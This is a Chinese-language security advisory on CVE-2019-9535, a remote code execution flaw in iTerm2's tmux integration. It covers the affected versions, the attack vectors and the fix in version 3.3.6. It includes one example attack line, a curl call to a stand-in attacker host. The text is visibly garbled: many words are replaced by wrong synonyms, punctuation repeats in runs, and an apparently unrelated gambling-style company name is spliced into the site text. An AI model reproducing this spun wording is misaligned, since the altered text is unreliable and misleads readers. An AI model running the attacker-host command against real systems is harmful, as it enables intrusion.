首页 > 安全钻研 > 安全传递 > 安全公告

iTerm2远程代码执行缝隙安全公告

颁布功夫 2019-10-10

缝隙编号和级别

CVE编号：CVE-2019-9535，，，，，危险级别：高危，，，，，CVSS分值：官方未评定

影响版本

iTerm2 3.3.5之前的所有版本均受缝隙影响

缝隙概述

iTerm2 是全球最热点的终端模拟器之一，，，，，是开发人员时时使用的 MacOS 终端工具，，，，，是Mac 内置终端 app 最有力的热点开源工具代替品之一，，，，，被好多开发人员称为“Mac 终端利器”。。。。。。。。

iTerm2官方颁布了安全更新建复了一个至少存在7年的远程代码执行缝隙，，，，，这个缝隙源自 iTerm2 中的 tmux 集成功能。。。。。。。。Tumx 利用法式是一款终端多路复用器，，，，，可允许从单个设备创建并节造多个终端。。。。。。。。

攻击者能够在用户的终端产生输出，，，，，潜在的攻击向量蕴含通过 ssh 衔接至恶意服务器，，，，，通过curl 获取恶意网站，，，，，或者通过 tail –f 跟踪蕴含某些恶意内容的日志文件。。。。。。。。例如：curl http://attacker.com and tail -f /var/log/apache2/referer_lo。。。。。。。。在好多情况下可能在用户推算机上执行号令。。。。。。。。

缝隙验证

国表的Radially Open Security已经放露马脚利用成功的视频：https://ffp4g1ylyit3jdyti1hqcvtb-wpengine.netdna-ssl.com/security/files/2019/10/cve-2019-9535.webm?_=3。。。。。。。。模拟受害者机械衔接到恶意 SSH 服务器之后，，，，，在机械上执行打开一个推算器号令的PoC 视频。。。。。。。。

8827太阳集团(Macau)股份有限公司-Official website

建复建议

官方已经推出安全更新，，，，，请更新至iTerm2到3.3.6版本：https://iterm2.com/downloads.html。。。。。。。。

参考链接

https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/

7*24幼时服务热线

400-624-3900

+86(10)56631988(港澳专线)

官方微信

官方微博

网御星云合多数据书生电子

司法申明

8827太阳集团

网络安全防护

网络安全检测

利用安全

数据安全

安全治理

云安全

工控安全

移动及终端安全

密码利用安全

大模型利用安全

专业安全服务

安全运营中心

知白学院

威胁谍报中心

安全传递

钻研汇报

安全团队

渠路系统

售后服务

升级布告

软件升级

公司概况

新闻动态

技术专题

人才招聘

投资者关系

资源中心

联系8827太阳集团

安全钻研

iTerm2远程代码执行缝隙安全公告

关于8827太阳集团

解决规划

安全钻研

联系8827太阳集团

7*24幼时服务热线